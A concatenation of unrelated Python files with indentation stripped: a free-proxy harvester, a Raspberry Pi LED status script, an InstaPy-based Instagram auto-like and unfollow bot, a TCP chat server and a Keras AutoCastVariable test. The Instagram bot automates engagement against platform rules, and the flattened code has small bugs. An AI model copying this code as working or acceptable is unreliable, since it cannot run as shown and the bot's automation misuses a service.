rs = re.findall(r'\d+\.\d+\.\d+\.\d+:\d+', text)
for r in rs:
r = r.strip()
r_ = r.split(':')
px = ProxyInstance(ip=r_[0],
port=r_[1],
protocol='https')
resultset.append(px)
return resultset
def run(self):
print('mclvren_proxy_list')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class a2u_free_proxy_list(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(a2u_free_proxy_list, self).__init__(*args, *kwargs)
self.base_url = 'https://raw.githubusercontent.com/a2u/free-proxy-list/master/free-proxy-list.txt'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
rs = re.findall(r'\d+\.\d+\.\d+\.\d+:\d+', text)
for r in rs:
r = r.strip()
r_ = r.split(':')
px = ProxyInstance(ip=r_[0],
port=r_[1],
protocol='https')
resultset.append(px)
return resultset
def run(self):
print('a2u_free_proxy_list')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class clarketm_proxy_list(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(clarketm_proxy_list, self).__init__(*args, *kwargs)
self.base_url = 'https://raw.githubusercontent.com/clarketm/proxy-list/master/proxy-list.txt'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
rs = re.findall(r'\d+\.\d+\.\d+\.\d+:\d+\s.*', text)
for r in rs:
r = r.strip()
if '-S' in r:
proto = 'https'
else:
proto = 'http'
r_ = r.split(' ')[0].split(':')
px = ProxyInstance(ip=r_[0],
port=r_[1],
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('clarketm_proxy_list')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class fate0_proxylist(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(fate0_proxylist, self).__init__(*args, **kwargs)
self.base_url = 'https://raw.githubusercontent.com/fate0/proxylist/master/proxy.list'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
lines = text.split('\n')
for line in lines:
line = line.strip()
if len(line) <= 0:
continue
p = json.loads(line)
px = ProxyInstance(ip=p['host'],
port=p['port'],
protocol=p['type'])
resultset.append(px)
return resultset
def run(self):
print('fate0_proxylist')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class ip_jiangxianli_com(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(ip_jiangxianli_com, self).__init__(*args, **kwargs)
self.base_url = 'http://ip.jiangxianli.com/?page={}'
def download(self, page):
response = requests.get(self.base_url.format(page), headers=self.headers)
response.raise_for_status()
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
urls = html.xpath('//button[contains(@class, "btn-copy")]/@data-url')
lines = urls
for line in lines:
line = line.strip()
if len(line) <= 0:
continue
px = ProxyInstance(ip=line.replace('//', '').split(':')[1],
port=line.split(':')[-1],
protocol=line.split(':')[0])
resultset.append(px)
return resultset
def run(self):
print('ip_jiangxianli_com')
if not self.check_alive():
return
for i in range(10):
text = self.download(i)
objs = self.parse(text)
if len(objs) <= 0:
break
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class ip3366_net(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(ip3366_net, self).__init__(*args, **kwargs)
self.base_url = [
'http://www.ip3366.net/free/?stype=1&page={}',
'http://www.ip3366.net/free/?stype=2&page={}'
]
def download(self, url, page):
response = requests.get(url.format(page), headers=self.headers)
response.raise_for_status()
response.encoding = 'gb2312'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
urls = html.xpath('//tbody//tr/td/text()')
ips = urls[0::7]
ports = urls[1::7]
protocols = urls[3::7]
for ip, port, proto in zip(ips, ports, protocols):
px = ProxyInstance(ip=ip,
port=port,
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('ip3366_net')
if not self.check_alive():
return
for url in self.base_url:
if not self.check_alive():
break
response = requests.get(url.format(1), headers=self.headers)
response.raise_for_status()
response.encoding = 'gb2312'
match_obj = re.search(r'page=(\d+)">尾页</a>', response.text)
if match_obj:
tot_page = int(match_obj.group(1))
for i in range(1, tot_page + 1):
if not self.check_alive():
break
text = self.download(url, i)
objs = self.parse(text)
if len(objs) <= 0:
break
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class www_goubanjia_com(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(www_goubanjia_com, self).__init__(*args, **kwargs)
self.base_url = 'http://www.goubanjia.com/'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
response.encoding = 'utf-8'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
tds = html.xpath('//tbody//tr/td[@class="ip"]')
ips = []
ports = []
for td in tds:
cs = []
for c in td.getchildren():
if c.attrib.get('style') != 'display: none;' and c.attrib.get('style') != 'display:none;':
if c.text != None:
cs.append(c.text)
ips.append(''.join(cs[:-1]))
ports.append(cs[-1])
protos = html.xpath('//tbody/tr/td/a[contains(@title, "http")]/text()')
for ip, port, proto in zip(ips, ports, protos):
px = ProxyInstance(ip=ip,
port=port,
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('www_goubanjia_com')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class proxy_coderbusy_com(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(proxy_coderbusy_com, self).__init__(*args, **kwargs)
self.base_url = 'https://proxy.coderbusy.com'
def download(self):
response = requests.get(self.base_url, headers=self.headers)
response.raise_for_status()
response.encoding = 'utf-8'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
tds = html.xpath('//tbody//tr/td')
rs = []
for td in tds:
if td.getchildren():
for c in td.getchildren():
if c.tag == 'span':
rs.append(c.text.strip())
else:
if td.text != None:
rs.append(td.text.strip())
else:
rs.append('None')
ips = rs[0::9]
ports = rs[1::9]
httpses = rs[3::9]
for ip, port, https in zip(ips, ports, httpses):
if https == '√':
proto = 'https'
else:
proto = 'http'
px = ProxyInstance(ip=ip,
port=port,
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('proxy_coderbusy_com')
if not self.check_alive():
return
text = self.download()
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class www_kuaidaili_com(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(www_kuaidaili_com, self).__init__(*args, **kwargs)
self.base_url = [
'https://www.kuaidaili.com/free/inha/{}/',
'https://www.kuaidaili.com/free/intr/{}/'
]
def download(self, url, page):
response = requests.get(url.format(page), headers=self.headers)
response.raise_for_status()
response.encoding = 'utf-8'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
ips = html.xpath('//tbody//td[@data-title="IP"]/text()')
ports = html.xpath('//tbody//td[@data-title="PORT"]/text()')
protos = html.xpath('//tbody//td[@data-title="类型"]/text()')
times = html.xpath('//tbody//td[@data-title="最后验证时间"]/text()')
for ip, port, proto, time in zip(ips, ports, protos, times):
if datetime.datetime.now().strftime('%Y-%m-%d') in time:
px = ProxyInstance(ip=ip,
port=port,
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('www_kuaidaili_com')
if not self.check_alive():
return
for url in self.base_url:
if not self.check_alive():
break
time.sleep(2)
response = requests.get(url.format(1), headers=self.headers)
response.raise_for_status()
response.encoding = 'utf-8'
match_obj = re.search(r'>(\d+)</a></li><li>页</li>', response.text)
if match_obj:
tot_page = int(match_obj.group(1))
for i in range(1, tot_page + 1):
if not self.check_alive():
break
time.sleep(1)
text = self.download(url, i)
objs = self.parse(text)
if len(objs) <= 0:
break
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class www_66ip_cn(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(www_66ip_cn, self).__init__(*args, **kwargs)
self.base_url = 'http://www.66ip.cn/areaindex_{}/1.html'
def download(self, page):
response = requests.get(self.base_url.format(page), headers=self.headers)
response.raise_for_status()
response.encoding = 'gb2312'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
nums = html.xpath('//p[@class="style7"]/span/text()')[0]
if nums == '0':
return resultset
tds = html.xpath('//table[@border="2px"]//td/text()')
ips = tds[0::5][1:]
ports = tds[1::5][1:]
for ip, port in zip(ips, ports):
px = ProxyInstance(ip=ip,
port=port,
protocol='http')
resultset.append(px)
return resultset
def run(self):
print('www_66ip_cn')
if not self.check_alive():
return
for num in range(1, 35):
if not self.check_alive():
break
text = self.download(num)
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
class www_xicidaili_com(CrawlerMeta):
def __init__(self, *args, **kwargs):
super(www_xicidaili_com, self).__init__(*args, **kwargs)
self.base_url = [
'https://www.xicidaili.com/nn/{}/',
'https://www.xicidaili.com/nt/{}/',
'https://www.xicidaili.com/wn/{}/',
'https://www.xicidaili.com/wt/{}/',
]
def download(self, url, page):
response = requests.get(url.format(page), headers=self.headers)
response.raise_for_status()
response.encoding = 'utf-8'
return response.text
def parse(self, text):
resultset = []
html = etree.HTML(text)
tds = html.xpath('//td/text()')
ips = tds[0::12]
ports = tds[1::12]
protos = tds[5::12]
for ip, port, proto in zip(ips, ports, protos):
px = ProxyInstance(ip=ip,
port=port,
protocol=proto)
resultset.append(px)
return resultset
def run(self):
print('www_xicidaili_com')
if not self.check_alive():
return
for url in self.base_url:
if not self.check_alive():
break
for i in range(1, 3):
if not self.check_alive():
break
time.sleep(1)
text = self.download(url, i)
objs = self.parse(text)
for obj in objs:
if not self.check_alive():
break
obj_ = verify(obj)
if obj_:
self.save(obj_)
def run():
crawlers = [
# hookzof_socks5_list(),
dxxzst_free_proxy_list(),
# TheSpeedX_SOCKS_List(),
mclvren_proxy_list(),
a2u_free_proxy_list(),
clarketm_proxy_list(),
fate0_proxylist(),
ip_jiangxianli_com(),
ip3366_net(),
www_goubanjia_com(),
proxy_coderbusy_com(),
www_kuaidaili_com(),
www_66ip_cn(),
www_xicidaili_com()
]
handlers = []
for c in crawlers:
handlers.append(threading.Thread(target=c.run))
for h in handlers:
try:
h.start()
except:
pass
|
ledStatus.py
|
#!/usr/bin/env python
import board
import requests
import argparse
import busio
import json
import time
import datetime
import adafruit_bme280
import threading
import RPi.GPIO as GPIO # Import Raspberry Pi GPIO library
import subprocess
import logging
import sys
from systemd import journal
""" blink the LED according to the pattern"""
def blinkLED():
while True:
for status in pattern:
if status[0]==1:
GPIO.output(pinID, GPIO.HIGH) # Turn on
else:
GPIO.output(pinID, GPIO.LOW) # Turn off
time.sleep(status[1]) # Sleep
patterns = { "heartbeat" : [ [1, 0.02], [0, 7] ],
"error" : [ [1, 0.01], [0, 0.09] ],
"off" : [ [0, 5] ],
"on" : [ [1, 5] ]
}
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Controls the LED status light.')
parser.add_argument('-t', '--cadence', type=int, default=5, help='Cadence in seconds.' )
parser.add_argument('-s', '--service', action="store_true", default=False, help='Specify this option if running as a service.' )
parser.add_argument('-c', '--config', type=str, default='/home/pi/code/meteopi/meteopi.cfg', help='Config file.' )
args = parser.parse_args()
configFile = open(args.config, 'rt')
config = json.loads(configFile.read())
ledFile = config['ledFile']
GPIO.setwarnings(True) # Ignore warning for now
GPIO.setmode(GPIO.BCM) # Use BCM pin numbering
pinID = config['ledPIN']
cadence = args.cadence
GPIO.setup(pinID, GPIO.OUT, initial=GPIO.LOW) #
if args.service:
log = logging.getLogger('LEDstatus.service')
log.addHandler(journal.JournaldLogHandler())
log.setLevel(logging.INFO)
logLine = "Starting the LED status service with a cadence of %d seconds"%cadence
log.info(logLine)
try:
statusFile = open(ledFile, "rt")
line = statusFile.readline().strip()
statusFile.close()
except OSError as e:
print("No", ledFile, "file found.")
sys.exit()
try:
pattern = patterns[line]
t = threading.Thread(name='non-block', target=blinkLED)
t.start()
if args.service: log.info("Set LED to %s."%line)
currentPattern = pattern
except:
print("Status %s unrecognised"%line)
sys.exit()
while True:
time.sleep(cadence)
try:
statusFile = open(ledFile, "rt")
line = statusFile.readline().strip()
statusFile.close()
except OSError as e:
print("No", ledFile, "file found.")
try:
pattern = patterns[line]
if pattern==currentPattern: continue
else:
if args.service: log.info("Changed LED to %s."%line)
currentPattern = pattern
except:
print("Status %s unrecognised"%line)
|
IG_Autolike.py
|
import argparse
import yaml
import instaloader
import threading
import signal
import sys
from instapy import InstaPy
from instapy.util import web_address_navigator, get_relationship_counts
from instapy.like_util import get_links_from_feed, check_link, like_image, verify_liking
from selenium.common.exceptions import NoSuchElementException
from colorama import Style, Fore
from typing import List, Set
def Ig_Auto_Like(
maxLikes : int = 2000,
minLikes : int = 10,
maxFollowers : int = 10000,
minFollowing : int = 30,
minFollowers : int = 30,
whiteList : List[str] = [],
unfollowWhiteList : List[str] = []
):
# similar implementation as InstaPy.like_by_feed_generator()
# autolike instagram posts and manage followees if specified
session.login()
postsLiked : int = 0
numOfSearch : int = 0
linkNotFoundLoopError : int = 0
history : List[str] = []
alreadyLiked : int = 0
whiteListLike : int = 0
postByNonFollowees : int = 0
breakOuterLoop : bool = False
unfollowWhiteList = set(unfollowWhiteList)
while (postsLiked < NUM_POSTS):
if (breakOuterLoop):
break
try:
links = get_links_from_feed(
session.browser, NUM_POSTS, numOfSearch, session.logger
)
if len(links) > 0:
linkNotFoundLoopError = 0
if len(links) == 0:
linkNotFoundLoopError += 1
if linkNotFoundLoopError >= 10:
session.logger.warning(
"Loop error, 0 links"
" for 10 times consecutively, exit loop"
)
break
except NoSuchElementException:
session.logger.warning("Too few images, aborting")
session.aborting = True
return
numOfSearch += 1
for _, link in enumerate(links):
if postsLiked == NUM_POSTS:
breakOuterLoop = True
break
if link in history:
session.logger.info(
"This link has already been visited: {}".format(
link)
)
continue
else:
session.logger.info("New link found...")
history.append(link)
session.logger.info(
"[{} posts liked / {} amount]".format(
postsLiked, NUM_POSTS)
)
session.logger.info(link)
try:
(
inappropriate,
userName,
isVideo,
reason,
scope,
) = check_link(
session.browser,
link,
session.dont_like,
session.mandatory_words,
session.mandatory_language,
session.is_mandatory_character,
session.mandatory_character,
session.check_character_set,
session.ignore_if_contains,
session.logger,
)
except KeyError as e:
print(Fore.RED + "KEYERROR EXCEPTION: {}".format(e))
print(
"This is likely due to the current InstaPy library implementation. Try run `pip3 install -I https://github.com/schealex/InstaPy/zipball/develop` to install the fix. If you believe this is not the cause, comment out this exception handler." + Style.RESET_ALL
)
print("For more information, refer to https://github.com/timgrossmann/InstaPy/issues/6191 and https://github.com/timgrossmann/InstaPy/pull/6195")
breakOuterLoop = True
break
except Exception as ex:
session.logger.info("EXCEPTION ENCOUNTERED: {}, continuing...".format(ex))
continue
if whiteListLike < NUM_POSTS / 3 and userName in whiteList:
session.logger.info("{} is in the whitelist".format(userName))
likeState, msg = like_image(
session.browser,
userName,
session.blacklist,
session.logger,
session.logfolder,
postsLiked,
)
if likeState is True:
postsLiked += 1
whiteListLike += 1
session.jumps["consequent"]["likes"] = 0
else:
alreadyLiked += 1
continue
if (not CONTACTS_RETRIEVED):
print(Fore.RED + "THREADINFO | Auto Like Thread Waiting For Secure Contacts Set" + Style.RESET_ALL)
CONTACTS_EVENT.wait()
print(Fore.GREEN + "THREADINFO | Auto Like Thread Resuming" + Style.RESET_ALL)
if userName not in SELF_FOLLOWEES:
postByNonFollowees += 1
session.logger.warning("{} is not a followee, skipping...".format(userName))
if postByNonFollowees > NUM_POSTS / 8:
session.logger.info("{} posts by non followees in feed, aborting".format(postByNonFollowees))
breakOuterLoop = True
break
if userName not in SECURE_CONTACTS:
session.logger.info("User Name not in secure contacts, skipping...")
continue
if isVideo or inappropriate:
session.logger.info("Post is video or inappropriate, skipping...")
continue
session.liking_approved = verify_liking(
session.browser,
maxLikes,
minLikes,
session.logger,
)
usrFollowerCnt, usrFollowingCnt = get_relationship_counts(
session.browser, userName, session.logger
)
if (usrFollowerCnt > maxFollowers or usrFollowerCnt < minFollowers or usrFollowingCnt < minFollowing):
session.logger.info("User follower / following count out of range, skipping...")
continue
minLikes = max(minLikes, usrFollowerCnt / 30)
if session.liking_approved:
# validate user
validation, details = session.validate_user_call(userName)
if validation is not True:
session.logger.info(details)
not_valid_users += 1
continue
else:
web_address_navigator(session.browser, link)
# try to like
likeState, msg = like_image(
session.browser,
userName,
session.blacklist,
session.logger,
session.logfolder,
postsLiked,
)
if likeState is True:
postsLiked += 1
session.jumps["consequent"]["likes"] = 0
else:
alreadyLiked += 1
if alreadyLiked >= NUM_POSTS / 3:
session.logger.info("Too much already liked posts, terminating")
session.logger.info("Already liked {} / Amount {}".format(alreadyLiked, NUM_POSTS))
breakOuterLoop = True
break
session.logger.info("Finished Liking {} / {} Posts".format(postsLiked, NUM_POSTS))
if (ARGS.unfollow):
if (not CONTACTS_RETRIEVED):
print(Fore.RED + "THREADINFO | Auto Like Thread (UNFOLLOW) Waiting For Secure Contacts Set" + Style.RESET_ALL)
CONTACTS_EVENT.wait()
print(Fore.GREEN + "THREADINFO | Auto Like Thread (UNFOLLOW) Resuming" + Style.RESET_ALL)
Manage_Contacts(unfollowWhiteList)
def Get_Secure_Contacts():
# get list of users that are both follower and followee
global SECURE_CONTACTS
global CONTACTS_RETRIEVED
global SELF_FOLLOWERS
global SELF_FOLLOWEES
print(Fore.GREEN + "THREADINFO | Getting Secure Contacts" + Style.RESET_ALL)
loader = instaloader.Instaloader()
loader.login(USERNAME, PASSWORD)
profile = instaloader.Profile.from_username(loader.context, USERNAME)
followees = profile.get_followees()
followers = profile.get_followers()
SELF_FOLLOWERS = {f.username for f in followers}
SELF_FOLLOWEES = {f.username for f in followees}
SECURE_CONTACTS = SELF_FOLLOWEES.intersection(SELF_FOLLOWERS)
CONTACTS_RETRIEVED = True
CONTACTS_EVENT.set()
print(Fore.GREEN + "THREADINFO | Thread Finished Processing Secure Contacts" + Style.RESET_ALL)
def Manage_Contacts(unfollowWhiteList : Set[str]):
# unfollow nonfollowers followed by the user
toUnfollow : List[str] = []
nonfollower = SELF_FOLLOWEES.difference(SELF_FOLLOWERS)
for userName in nonfollower:
if userName not in unfollowWhiteList:
usrFollowerCnt, usrFollowingCnt = get_relationship_counts(
session.browser, userName, session.logger
)
if usrFollowerCnt < cfg["maxFollowers"]:
toUnfollow.append(userName)
session.logger.info("{} will be unfollowed".format(userName))
else:
session.logger.info("User {} in unfollow white list, skipping".format(userName))
session.unfollow_users(
amount = len(toUnfollow),
custom_list_enabled = True,
custom_list = toUnfollow,
custom_list_param = "all",
style = "RANDOM",
unfollow_after = None,
sleep_delay = 60
)
def Browser_Signal_Handler(sig, frame):
# Signal handler for keyboard interruption
session.logger.info("Process Terminated through SIGINT")
sys.exit(0)
def Main():
# Main thread
contactThread = threading.Thread(target = Get_Secure_Contacts)
autoLikeThread = threading.Thread(target = Ig_Auto_Like, kwargs = cfg)
contactThread.daemon = True
contactThread.start()
autoLikeThread.start()
contactThread.join()
autoLikeThread.join()
if __name__ == "__main__":
signal.signal(signal.SIGINT, Browser_Signal_Handler)
ARG_PARSER = argparse.ArgumentParser()
ARG_PARSER.add_argument("-u", "--username", help = "your ig username", required = True)
ARG_PARSER.add_argument("-p", "--password", help = "your ig password", required = True)
ARG_PARSER.add_argument("-a", "--amount", type = int, help = "posts to like", required = False, default = 0)
ARG_PARSER.add_argument("-f", "--unfollow", help = "whether to unfollow nonfollowers", action='store_true')
ARGS = ARG_PARSER.parse_args()
USERNAME = ARGS.username
PASSWORD = ARGS.password
NUM_POSTS = ARGS.amount
with open('Config.yaml', 'r') as cfgFile:
cfg = yaml.load(cfgFile, yaml.SafeLoader)
CONTACTS_RETRIEVED = False
CONTACTS_EVENT = threading.Event()
SECURE_CONTACTS : Set[str] = set()
SELF_FOLLOWERS : Set[str] = set()
SELF_FOLLOWEES : Set[str] = set()
session = InstaPy(username= USERNAME, password= PASSWORD)
Main()
session.browser.close()
|
server.py
|
#!/usr/bin/env python3
import socketserver
import sys
import threading
# usage: ./server.py [PORT] [HOST]
CLIENTS = []
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
# Class is instantiated once per connection to the server
def handle(self):
CLIENTS.append(self.request)
welcomeMsg = self.client_address[0] + ":" + str(self.client_address[1]) + " joined." + '\n'
sys.stdout.write(welcomeMsg)
sys.stdout.flush()
for cli in CLIENTS:
if cli is not self.request:
cli.sendall(welcomeMsg.encode())
while True:
data = self.request.recv(4096)
if data:
data = data.decode()
sendMsg = self.client_address[0] + ":" + str(self.client_address[1]) + "> " + data
sys.stdout.write(sendMsg)
sys.stdout.flush()
for cli in CLIENTS:
if cli is not self.request:
cli.sendall(sendMsg.encode())
else:
sendMsg = self.client_address[0] + ":" + str(self.client_address[1]) + " left." + '\n'
sys.stdout.write(sendMsg)
sys.stdout.flush()
CLIENTS.remove(self.request)
for cli in CLIENTS:
cli.sendall(sendMsg.encode())
break
if __name__ == "__main__":
if len(sys.argv) == 1:
HOST = ("localhost", 10000)
elif len(sys.argv) == 2:
HOST = ("localhost", int(sys.argv[1]))
else:
HOST = (sys.argv[2], int(sys.argv[1]))
server = ThreadedTCPServer(HOST, ThreadedTCPRequestHandler)
server.daemon_threads = True
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
sys.stdout.write("Server is up." + '\n')
sys.stdout.flush()
# Main execution will push
while True:
try:
msg = sys.stdin.readline()
msg = "Server> " + msg
sys.stdout.write(msg)
sys.stdout.flush()
for client in CLIENTS:
client.sendall(msg.encode())
except KeyboardInterrupt:
break
server.shutdown()
server.server_close()
sys.stdout.write("Server is closed." + '\n')
sys.stdout.flush()
|
autocast_variable_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for AutoCastVariable."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import os
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.python.distribute import test_util
from keras.mixed_precision import autocast_variable
from keras.optimizer_v2 import gradient_descent as gradient_descent_v2
maybe_distribute = tf.__internal__.test.combinations.combine(distribution=[
tf.__internal__.distribute.combinations.default_strategy,
tf.__internal__.distribute.combinations.mirrored_strategy_with_cpu_1_and_2
])
def get_var(val, dtype, name=None):
return tf.compat.v1.Variable(val, use_resource=True, dtype=dtype, name=name)
@tf.__internal__.distribute.combinations.generate(tf.__internal__.test.combinations.combine(mode=['graph', 'eager']))
class AutoCastVariableTest(tf.test.TestCase, parameterized.TestCase):
def setUp(self):
test_util.set_logical_devices_to_at_least('CPU', 3)
super(AutoCastVariableTest, self).setUp()
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_read(self, distribution):
with distribution.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
# outside of auto cast scope.
self.assertEqual(x.dtype, tf.float32)
self.assertEqual(x.value().dtype, tf.float32)
self.assertEqual(x.read_value().dtype, tf.float32)
self.assertEqual(tf.identity(x).dtype, tf.float32)
# within auto cast scope of different dtype
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertEqual(x.dtype, tf.float32)
self.assertEqual(x.value().dtype, tf.float16)
self.assertEqual(x.read_value().dtype, tf.float16)
self.assertEqual(tf.identity(x).dtype, tf.float16)
# within auto cast scope of same dtype
with autocast_variable.enable_auto_cast_variables(tf.float32):
self.assertEqual(x.dtype, tf.float32)
self.assertEqual(x.value().dtype, tf.float32)
self.assertEqual(x.read_value().dtype, tf.float32)
self.assertEqual(tf.identity(x).dtype, tf.float32)
def test_sparse_reads(self):
x = get_var([1., 2], tf.float32)
# DistributedVariables do not support sparse_read or gather_nd, so we pass
# distribute=False
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
self.assertEqual(x.sparse_read([0]).dtype, tf.float32)
self.assertEqual(x.gather_nd([0]).dtype, tf.float32)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertEqual(x.sparse_read([0]).dtype, tf.float16)
self.assertEqual(x.gather_nd([0]).dtype, tf.float16)
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_read_nested_scopes(self, distribution):
with distribution.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.evaluate(x.initializer)
with autocast_variable.enable_auto_cast_variables(tf.float16):
self.assertEqual(x.read_value().dtype, tf.float16)
with autocast_variable.enable_auto_cast_variables(tf.float32):
self.assertEqual(x.read_value().dtype, tf.float32)
self.assertEqual(x.read_value().dtype, tf.float16)
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_dtype_is_not_string(self, distribution):
with distribution.scope():
x = get_var(1., tf.float32)
x = autocast_variable.create_autocast_variable(x)
self.assertEqual(x.dtype, tf.float32)
self.assertIsInstance(x.dtype, tf.DType)
self.assertEqual(x.true_dtype, tf.float32)
self.assertIsInstance(x.true_dtype, tf.DType)
dtype = tf.float16
with autocast_variable.enable_auto_cast_variables(dtype):
self.assertEqual(x.dtype, tf.float32)
self.assertIsInstance(x.dtype, tf.DType)
self.assertEqual(x.true_dtype, tf.float32)
self.assertIsInstance(x.true_dtype, tf.DType)
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_method_delegations(self, distribution):
# Test AutoCastVariable correctly delegates Variable methods to the
# underlying variable.
with self.test_session(), distribution.scope():
for read_dtype in (tf.float32, tf.float16):
if tf.distribute.has_strategy():
# MirroredVariable.assign will (incorrectly) return a Mirrored value
# instead of a MirroredVariable. So we cannot properly wrap it in an
# AutoCastVariable.
evaluate = self.evaluate
else:
def evaluate(var):
self.assertIsInstance(var, autocast_variable.AutoCastVariable)
self.assertEqual(tf.identity(var).dtype, read_dtype) # pylint: disable=cell-var-from-loop
return self.evaluate(var)
x = get_var(7., tf.float32)
x = autocast_variable.create_autocast_variable(x)
with autocast_variable.enable_auto_cast_variables(read_dtype):
self.evaluate(x.initializer)
self.assertEqual(self.evaluate(x.value()), 7)
self.assertEqual(self.evaluate(x.read_value()), 7)
self.assertTrue(x.trainable)
self.assertEqual(x.synchronization, x._variable.synchronization)
self.assertEqual(x.aggregation, x._variable.aggregation)
self.assertEqual(self.evaluate(x.initialized_value()), 7)
if not tf.executing_eagerly():
if not tf.distribute.has_strategy():
# These functions are not supported for DistributedVariables
x.load(9)
self.assertEqual(x.eval(), 9)
self.assertEqual(self.evaluate(x.initial_value), 7)
self.assertEqual(x.op, x._variable.op)
self.assertEqual(x.graph, x._variable.graph)
if not tf.distribute.has_strategy():
# These attributes are not supported for DistributedVariables
self.assertIsNone(x.constraint)
self.assertEqual(x.initializer, x._variable.initializer)
self.assertEqual(evaluate(x.assign(8)), 8)
self.assertEqual(evaluate(x.assign_add(2)), 10)
self.assertEqual(evaluate(x.assign_sub(3)), 7)
self.assertEqual(x.name, x._variable.name)
self.assertEqual(x.device, x._variable.device)
self.assertEqual(x.shape, ())
self.assertEqual(x.get_shape(), ())
if not tf.distribute.has_strategy():
# Test scatter_* methods. These are not supported for
# DistributedVariables
x = get_var([7, 8], tf.float32)
x = autocast_variable.create_autocast_variable(x)
with autocast_variable.enable_auto_cast_variables(read_dtype):
self.evaluate(x.initializer)
self.assertAllEqual(self.evaluate(x.value()), [7, 8])
def slices(val, index):
return tf.IndexedSlices(
values=tf.constant(val, dtype=tf.float32),
indices=tf.constant(index, dtype=tf.int32),
dense_shape=tf.constant([2], dtype=tf.int32))
self.assertAllEqual(evaluate(x.scatter_sub(slices(1., 0))), [6, 8])
self.assertAllEqual(evaluate(x.scatter_add(slices(1., 0))), [7, 8])
self.assertAllEqual(evaluate(x.scatter_max(slices(9., 1))), [7, 9])
self.assertAllEqual(evaluate(x.scatter_min(slices(8., 1))), [7, 8])
self.assertAllEqual(evaluate(x.scatter_mul(slices(2., 1))), [7, 16])
self.assertAllEqual(evaluate(x.scatter_div(slices(2., 1))), [7, 8])
self.assertAllEqual(
evaluate(x.scatter_update(slices(4., 1))), [7, 4])
self.assertAllEqual(
evaluate(x.scatter_nd_sub([[0], [1]], [1., 2.])), [6, 2])
self.assertAllEqual(
evaluate(x.scatter_nd_add([[0], [1]], [1., 2.])), [7, 4])
self.assertAllEqual(
evaluate(x.scatter_nd_update([[0], [1]], [1., 2.])), [1, 2])
@tf.__internal__.distribute.combinations.generate(maybe_distribute)
def test_operator_overloads(self, distribution):
with distribution.scope():
for read_dtype in (tf.float32, tf.float16):
x = get_var(7., tf.float32)
x = autocast_variable.create_autocast_variable(x)
with autocast_variable.enable_auto_cast_variables(read_dtype):
self.evaluate(x.initializer)
self.assertAlmostEqual(8, self.evaluate(x + 1))
self.assertAlmostEqual(10, self.evaluate(3 + x))
self.assertAlmostEqual(14, self.evaluate(x + x))
